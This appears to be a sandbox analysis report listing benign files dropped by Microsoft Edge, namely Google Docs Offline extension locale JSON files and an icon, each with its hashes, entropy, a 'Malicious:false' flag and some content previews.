                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4982
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                          MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                          SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                          SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                          SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):908
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                          MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                          SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                          SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                          SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1285
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                          MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                          SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                          SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                          SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1244
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                          MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                          SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                          SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                          SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                          MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                          SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                          SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                          SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3107
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                          MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                          SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                          SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                          SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1389
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                          MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                          SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                          SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                          SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1763
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):913
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):806
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):883
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1031
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1613
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):848
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                          MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                          SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                          SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                          SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                          MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                          SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                          SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                          SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):961
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                          MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                          SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                          SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                          SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):959
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                          MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                          SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                          SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                          SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):968
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                          MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                          SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                          SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                          SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                          Malicious:false
